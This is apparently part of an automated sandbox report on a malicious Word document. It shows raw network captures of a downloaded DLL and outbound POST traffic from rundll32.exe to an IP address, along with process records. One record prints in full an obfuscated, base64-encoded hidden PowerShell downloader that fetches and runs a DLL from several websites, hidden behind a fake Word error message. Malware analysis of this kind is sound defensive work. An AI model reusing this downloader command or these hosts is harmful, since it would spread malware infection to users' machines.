00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$:wTwTwTwTwTwT-wT-wTwUSwT-wTwTwTwTwwTwTRichwTPEL_!JE0P 8@.text `.rdataJL@@.data- @.rsrc P@@.relocH@B
Jan 6, 2021 08:49:13.808175087 CET	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: UEE]%T
Jan 6, 2021 08:49:13.808206081 CET	4	IN	Data Raw: cc cc cc cc cc cc cc cc e9 1b 14 00 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 53 56 57 8b 7d 08 8b 1f 8b 77 04 83 bb 84 00 00 00 00 89 75 08 0f 84 48 01 00 00 8b 9b 80 00 00 00 03 de 6a 14 53 89 5d f8 ff 15 94 d0 00 10 85 c0 0f 85 2c Data Ascii: USVW}wuHjS],ICw(PGuGPwGOGtE4KsutE+Mw(1yMPG
Jan 6, 2021 08:49:13.808237076 CET	5	IN	Data Raw: 06 8b 4e 04 8b 40 28 6a 00 6a 00 51 03 c1 ff d0 83 7e 08 00 74 3a 57 33 ff 39 7e 0c 7e 1c 8b 46 08 8b 04 b8 85 c0 74 0c ff 76 28 50 8b 46 24 ff d0 83 c4 08 47 3b 7e 0c 7c e4 8b 46 08 5f 85 c0 74 0e 68 00 80 00 00 6a 00 50 ff 15 80 d0 00 10 8b 46 Data Ascii: N@(jjQ~t:W39~~Ftv(PF$G;~\|F_thjPFthjPVjxPt^]UEHMx\|ujl3]PxDUEtztSVuWuB;r]+rr Z$39zvHEU
Jan 6, 2021 08:49:13.808267117 CET	7	IN	Data Raw: 57 8d 49 00 03 c1 8d 7b 04 89 45 fc 8b 07 83 e8 08 33 f6 8d 53 08 a9 fe ff ff ff 76 3a 8b 5d fc 8d 64 24 00 0f b7 02 8b c8 81 e1 00 f0 00 00 81 f9 00 30 00 00 75 0b 8b 4d 0c 25 ff 0f 00 00 01 0c 18 8b 07 83 e8 08 46 d1 e8 83 c2 02 3b f0 72 d3 8b Data Ascii: WI{E3Sv:]d$0uM%F;r]M]u_^[]UUtEVu+@Ju^]VF8FLNtQPFNtQPFNtQPF
Jan 6, 2021 08:49:13.808304071 CET	8	IN	Data Raw: 00 10 ff 15 c0 d1 00 10 85 c0 0f 88 b2 00 00 00 8b 0b 0f 57 c0 66 0f d6 45 f0 b8 0d 00 00 00 66 89 45 f0 8b 45 0c 66 0f d6 45 f8 f3 0f 7e 45 f0 89 45 f8 8d 45 08 50 83 ec 10 8b c4 c7 45 08 00 00 00 00 8b 11 66 0f d6 00 f3 0f 7e 45 f8 51 66 0f d6 Data Ascii: WfEfEEfE~EEEPEf~EQf@u=f}u6O=x-UOQhRxEG_^[]@tQP_^[]_^[]3Uuu
Jan 6, 2021 08:49:13.808339119 CET	10	IN	Data Raw: 55 8b ec 51 8b 45 10 8b 55 0c 56 57 ff 75 14 8b 7d 08 85 c0 8b 37 0f 45 d0 52 57 89 4d fc ff 96 94 00 00 00 85 c0 74 3a 8b 45 fc 8d 55 08 8b 40 18 52 ff 75 0c c7 45 08 00 00 00 00 8b 08 50 ff 91 bc 00 00 00 85 c0 78 19 ff 75 14 8b 07 ff 75 08 57 Data Ascii: UQEUVWu}7ERWMt:EU@RuEPxuuWPTMQR_^]UQS{CuFPhtEx5VWXVOutE_^[]3[]U\X!3EME@QE
Jan 6, 2021 08:49:13.808373928 CET	11	IN	Data Raw: 10 ff 75 f8 ff 15 64 d1 00 10 8b 45 fc 50 8b 08 ff 51 08 8b 45 fc 50 8b 08 ff 51 08 57 ff 15 64 d1 00 10 8b c6 5e 5f 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 30 a1 58 21 01 10 33 c5 89 45 fc 53 56 8b d9 57 8b 43 1c 8d 4d e0 8b Data Ascii: udEPQEPQWd^_]U0X!3ESVWCMQPR3~;}suCURWPQx\CURURPQ xE}u?CURWUfEfERPQxEPEP'EPGyM_^3[]
Jan 6, 2021 08:49:13.808407068 CET	12	IN	Data Raw: 00 10 57 ff 15 9c d1 00 10 85 c0 75 10 68 c8 e3 00 10 57 ff 15 9c d1 00 10 85 c0 74 0d 8b 85 f8 fb ff ff c6 80 6a 02 00 00 01 8b 4d fc 33 c0 81 fe 02 00 07 80 0f 44 f0 5f 8b c6 33 cd 5e e8 59 04 00 00 8b e5 5d c3 cc cc cc cc cc 55 8b ec 81 ec 0c Data Ascii: WuhWtjM3D_3^Y]UX!3EES]VEW}EPWhP3x=wuz3fEuPujPS~xL
Jan 6, 2021 08:49:13.808442116 CET	14	IN	Data Raw: 04 0f ba e7 03 73 11 f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 f7 c6 07 00 00 00 74 63 0f ba e6 03 0f 83 b2 00 00 00 66 0f 6f 4e f4 8d 76 f4 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f Data Ascii: s~vftcfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}vfoNvIfo^0foF fon0v00fof:ffof:fGfof:fo 0}vVfoNvfo^0foF
Jan 6, 2021 08:49:13.882118940 CET	15	IN	Data Raw: 8d 76 10 8d 7f 10 4a 75 ef 83 e1 0f 74 2a 8b c1 c1 e9 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04 49 75 f3 8b c8 83 e1 03 74 0f 8a 06 88 07 46 47 49 75 f7 8d 9b 00 00 00 00 58 5e 5f c3 8d a4 24 00 00 00 00 eb 03 cc cc cc ba 10 00 00 00 2b d0 2b ca 51 Data Ascii: vJut*tvIutFGIuX^_$++QtFGIutvHuYQT\|YUAPEPYY@]UVEtVY^]U]%UuY]Uujuuu

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	5.2.136.90	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 6, 2021 08:49:32.588160992 CET	200	OUT	POST /76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/ HTTP/1.1 DNT: 0 Referer: 5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/ Content-Type: multipart/form-data; boundary=--------------sArhAY1ugWdoQV User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 5.2.136.90 Content-Length: 5940 Connection: Keep-Alive Cache-Control: no-cache
Jan 6, 2021 08:49:32.588224888 CET	202	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 73 41 72 68 41 59 31 75 67 57 64 6f 51 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 4f 72 53 6e 76 65 56 44 22 3b Data Ascii: ----------------sArhAY1ugWdoQVContent-Disposition: form-data; name="OrSnveVD"; filename="aeMdVn"Content-Type: application/octet-stream]"D5*SOze\|IZduc]td 1+=ck+=gRPA9"6Y]p
Jan 6, 2021 08:49:32.660144091 CET	206	OUT	Data Raw: b7 45 21 f2 4a 2e 0f 41 7f bc 54 af 7f 5d c1 58 02 7f e7 d4 72 0e 27 01 d7 99 b5 77 04 2e a9 8e 40 58 00 c4 56 18 e0 2a f0 60 72 11 e4 9c ef 53 31 81 5b 4a 7e 27 25 f3 95 3b b8 24 4c 29 76 a0 cd c0 38 2e b2 18 6b c0 4c 56 db a7 f7 02 b3 2c 5f 2e Data Ascii: E!J.AT]Xr'w.@XV*`rS1[J~'%;$L)v8.kLV,_.#CE%P_he\|Q&Jl.N2F.1U)2QIQ@1c?nI'#sJ,54B9Wbo9(8PyM4Or^
Jan 6, 2021 08:49:32.733161926 CET	206	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 6, 2021 08:49:33.304199934 CET	208	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 06 Jan 2021 07:49:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 66 38 34 0d 0a 53 97 06 1b 16 33 39 9f c1 09 dd 4d cb a3 a4 db a9 1c 20 be 0c 9c 93 80 84 b3 8b 03 85 93 79 0e d0 96 17 ea e5 76 f1 b0 d4 3d 3b 72 42 22 68 03 8f 2f bd 76 75 31 b6 49 8f 43 f1 4a ee 61 7c e9 06 44 61 c2 a6 47 d7 39 bf 32 e7 08 35 c9 57 38 c3 0f 3c 9d 55 af af 54 ff c4 1d 40 01 e7 8c 38 e4 86 50 5e 04 3e 63 8e b6 66 29 e6 fd 66 e7 f1 bb fb b7 77 1a 0c 15 49 0e 3f 5d 14 f5 6c f4 c8 cd dc fb 3a bc ef 74 4f d2 c8 62 61 36 5c d4 15 3a a0 b1 ba 52 1b 50 1b 92 6f df b5 31 ac d5 a5 69 2a 16 0b 13 ff 98 d7 b7 aa 3a 6f 9c a5 5b 15 76 57 6a c4 06 d1 16 2f 44 34 ff 7d 55 d1 29 41 a3 f3 a2 4f c9 b3 2d 92 e1 fd 32 bb 13 52 e6 44 b5 69 15 8d 53 4c f9 1e 54 57 bd 93 a8 19 ea a5 f1 14 8a 4d e6 1e 7a 48 dd e2 53 47 20 34 c0 6d f6 2d 18 e3 e9 e5 fe 28 a8 24 51 e3 da 42 0d c7 bb dc 5c 6c 05 70 ff f2 8f 41 c6 c6 b3 b6 9d ef aa 75 89 69 1d 75 62 b7 d9 b0 14 cd 5c 19 7c 7a c1 de 9b da 53 45 12 77 0c c9 cb 16 74 9e 3f 4c 62 21 56 72 fc 8c f9 e1 ab f4 d0 46 9f d6 2e c8 f5 c0 c8 79 64 75 1e 11 1a 62 cf a1 31 4f 1e 74 78 72 a2 eb 3b 2b 86 73 0d 80 1b f9 6a 69 06 7d e3 10 d4 67 15 5c 92 a5 5d 1b 22 fe cf 5b 91 1f 04 33 70 cb 64 43 a3 a8 5f 32 ae fa fd 0d fc b4 10 bb 7e 7d 3e 97 55 55 cf c5 8d 2d 87 18 aa 99 ab 2d 07 2c 5c 07 8e 38 60 9f b0 99 e6 37 3e 74 ef ef 24 9b 0d fd 59 a6 f0 40 cc 06 8f 62 f1 75 03 70 10 98 41 32 ae f5 e7 26 4f ed 0c f3 3e a2 f8 e6 49 1c 52 41 1e 0f 62 08 8e 65 73 15 8d e0 e8 67 b5 10 a7 8d 18 67 d1 32 bd 3b a0 63 41 2c 02 1c 38 9b 97 03 2e 22 d6 05 c1 18 76 cd 69 bf b9 b9 43 f3 51 63 c7 58 7b 5f 46 d3 9a c9 9e 3b 62 1a be 49 7e 8f 0c 90 f9 44 2b 34 f8 7d 4a 23 2e 5b 3a 82 ea 02 5e 19 da 90 ab 46 56 01 82 0f 87 61 0a 5e b5 9f 22 ef b5 91 e7 4e 0d 95 1c 5d 50 a8 31 e2 8b 4b 0b 64 cd d2 73 48 d3 fd db d7 fc 6a e4 3e dc ff 2e 9b eb a1 14 1b c7 90 8b 94 4c 1c d6 64 ab c9 72 8e d4 f4 68 4b d7 6c 5a f4 d3 97 33 ca a5 e4 2d d2 77 eb 9f 3d 81 68 79 9a 7c 1e 16 5b b5 4e 1d 26 36 67 eb f7 de 24 c5 8c 26 95 06 b2 5a 26 e6 2b 4e 93 a3 1a 3b b6 b0 be b1 82 08 d5 c9 c1 b6 59 56 c1 44 5d d3 bd 0d 76 06 58 14 dc 22 e8 c7 3e 71 5f c3 1e d3 5b 27 56 ba 9c ce 40 cc 36 87 18 69 b3 a3 0c 5a dc 0f 3c 22 3c d6 d8 58 c9 bc d2 95 23 85 71 e7 1a 42 2b c0 d9 af 3c dc 4b c8 50 54 e7 19 05 e5 f0 ab 52 18 e7 93 18 f2 ec eb f2 54 70 e2 89 ac bd 95 2b 41 e0 93 c7 92 da db 4e e9 bf a9 6d 78 99 b0 c3 96 99 60 19 d3 0f 20 4f 3f d8 c2 35 15 9a fe 60 7b ab 5e 4d b8 94 62 9a bb b4 27 da 91 ff 1d 37 a9 61 7e d2 13 93 50 bc 9c 6f 17 3d 6d b4 06 26 11 cc 09 5a 39 07 76 49 4b 23 fd 78 22 a8 78 1f a1 d1 32 c4 78 be ec 41 16 19 95 34 da f5 5c 38 3c 5c 3a 78 36 24 ed b0 a7 ef 19 2b 33 db 68 82 db 22 e1 45 22 1d 6f 7b fd a9 d5 6a 99 e5 0a 0e df 4e 39 6a 64 c8 52 a7 20 44 a6 e1 92 90 18 a9 18 f5 2c b2 75 85 3e f2 29 af 4a f3 48 d3 aa f9 df 3e fc c0 7e 7a 1d 04 9c f9 b6 5a 4c 86 7b c2 1e 29 7e 2a 3c 67 4c f2 57 97 6e af ae fa 4b 56 a2 13 96 68 0e e6 03 f6 c1 63 75 a7 f1 f9 6f 30 85 06 07 57 d0 95 3e 95 f0 f7 37 cf 13 cc bf e1 df 6b b5 ed e9 85 c7 43 64 9c 33 46 db f1 81 12 b9 89 6f 2b e5 92 28 74 07 cf 8b 22 c8 e1 65 f3 ef 76 6c 71 31 a3 d8 69 11 b0 48 9d 37 d9 bd 4b d8 3a 21 59 1c 7b 05 6c 4a 1f c4 f4 05 1a 3d 7d e0 a3 08 88 a2 55 0b 9b 55 08 b0 fc 02 18 b0 c5 eb 53 93 7e 6e fa 0e e9 08 25 ae 1a 67 98 6a 75 9f 83 79 3f 7f 7e 62 c7 6b ee f0 6b 3a 39 3b bb 21 fc 91 c3 d5 6b a8 a6 58 f3 ce 4b 98 a1 03 8f 47 a0 1a 65 92 2f dd 3f 59 f3 30 6a 40 a9 be e5 29 b7 e0 11 a7 15 fb 99 71 33 2d 93 ff fd 36 f1 08 ed 60 5a 16 c1 87 d5 5b 96 64 Data Ascii: f84S39M yv=;rB"h/vu1ICJa\|DaG925W8<UT@8P^>cf)fwI?]l:tOba6\:RPo1i:o[vWj/D4}U)AO-2RDiSLTWMzHSG 4m-($QB\lpAuiub\\|zSEwt?Lb!VrF.ydub1Otxr;+sji}g\]"[3pdC_2~}>UU--,\8`7>t$Y@bupA2&O>IRAbesgg2;cA,8."viCQcX{_F;bI~D+4}J#.[:^FVa^"N]P1KdsHj>.LdrhKlZ3-w=hy\|[N&6g$&Z&+N;YVD]vX">q_['V@6iZ<"<X#qB+<KPTRTp+ANmx` O?5`{^Mb'7a~Po=m&Z9vIK#x"x2xA4\8<\:x6$+3h"E"o{jN9jdR D,u>)JH>~zZL{)~<gLWnKVhcuo0W>7kCd3Fo+(t"evlq1iH7K:!Y{lJ=}UUS~n%gjuy?~bkk:9;!kXKGe/?Y0j@)q3-6`Z[d
Jan 6, 2021 08:49:33.304248095 CET	209	IN	Data Raw: 44 c0 bc 5c bd cc 54 33 de 4e ab 64 c4 0f ab b6 eb 1e 5e a1 88 05 a1 f6 93 b6 ef e3 ce ee fe 5f 96 2e d4 b7 5b e8 7e 19 f9 fc 1c ad 0b 79 a7 c1 32 6a ed 7c 7f 97 de d7 4a 2a 30 cb 02 31 3d cc 51 6d 71 d2 67 9b f3 40 21 e1 5d 3d 75 d4 a8 92 ec cd Data Ascii: D\T3Nd^_.[~y2j\|J01=Qmqg@!]=uoxOlR81Dqg+7g=kHd!f.fa_2%*.}Sy6&DnBnC2F)jEVUY.IGRiuf7(-h=[<:r0Ij`[Qn
Jan 6, 2021 08:49:33.376061916 CET	210	IN	Data Raw: 5d d7 df 40 d9 f8 7a 11 6e 9c f4 90 94 56 51 7e 27 40 24 1a 55 88 19 1a c2 fa 32 d8 c0 37 3b ae 7f 93 95 e2 3d c2 fd f3 a4 25 c5 de f9 51 d3 00 89 3e dd 25 15 ad b1 d8 f3 58 4b f8 dc 37 92 a8 21 44 b3 fe 38 74 56 b3 49 0c 8e e6 9d 36 aa c5 06 e1 Data Ascii: ]@znVQ~'@$U27;=%Q>%XK7!D8tVI6sg3u<>u;\W&gmA(\"xFx)}Funvte<V6mPZT`UYokhhM{vOZ;Mn`yyf~b}kGV7<:MZ R
Jan 6, 2021 08:49:33.376100063 CET	211	IN	Data Raw: ff 2d c8 29 de 65 e4 69 d3 f1 9f d0 42 30 17 58 bb b1 28 45 7f 2b a6 d9 46 5a da 8c e7 11 00 60 0a 6b ae 1e 9a 3e 91 b5 2e c8 5b 8f 01 bb 35 af 2b 4c 1a ba 2e f2 39 62 d5 ed b0 f6 8d 96 9e aa c6 00 46 af cf cd 91 bc 0a 31 41 bf 10 a8 69 68 ed 33 Data Ascii: -)eiB0X(E+FZ`k>.[5+L.9bF1Aih3I9]pC\2s. b$3(p^)\|G22RU7??9nf0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 944 Parent PID: 584

General

Start time:	08:48:38
Start date:	06/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f920000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2288 Parent PID: 1220

General

Start time:	08:48:40
Start date:	06/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAHAAbABpAFQAIgAoACQAUQA5ADMASAAgACsAIAAkAEgAYwA2AGMANgB1AHkAIAArACAAJABIADgAOQBaACkAOwAkAEUANwA1AFYAPQAoACgAJwBJACcAKwAnADEANwAnACkAKwAnAFgAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAGoAawBlADAAbABlACAAaQBuACAAJABHAHIANgB4AF8AaABfACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABvAHcAYABOAGwATwBgAEEAYABEAGYASQBsAGUAIgAoACQAQwBqAGsAZQAwAGwAZQAsACAAJABXADcAaQBvADAAdwBnACkAOwAkAFIANQA1AFMAPQAoACcAQgAnACsAKAAnADYANgAnACsAJwBTACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFcANwBpAG8AMAB3AGcAKQAuACIAbABgAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADQAMwAxADIANgApACAAewAmACgAJwByAHUAbgAnACsAJwBkACcAKwAnAGwAbAAzADIAJwApACAAJABXADcAaQBvADAAdwBnACwAKAAoACcAQwBvAG4AJwArACcAdAByAG8AJwApACsAKAAnAGwAJwArACcAXwBSAHUAJwApACsAJwBuAEQAJwArACcATABMACcAKQAuACIAdABgAE8AcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQAWgAwADAAUAA9ACgAKAAnAFIAOQAnACsAJwA0ACcAKQArACcASgAnACkAOwBiAHIAZQBhAGsAOwAkAEcAOQAyAEkAPQAoACcAVQA4ACcAKwAnADkAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMQA3AE0APQAoACcASwA3ACcAKwAnADkAVQAnACkA
Imagebase:	0x49ee0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msg.exe PID: 2616 Parent PID: 2288

General

Start time:	08:48:40
Start date:	06/01/2021
Path:	C:\Windows\System32\msg.exe
Wow64 process (32bit):	false
Commandline:	msg user /v Word experienced an error trying to open the file.
Imagebase:	0xff630000
File size:	26112 bytes
MD5 hash:	2214979661E779C3E3C33D4F14E6F3AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
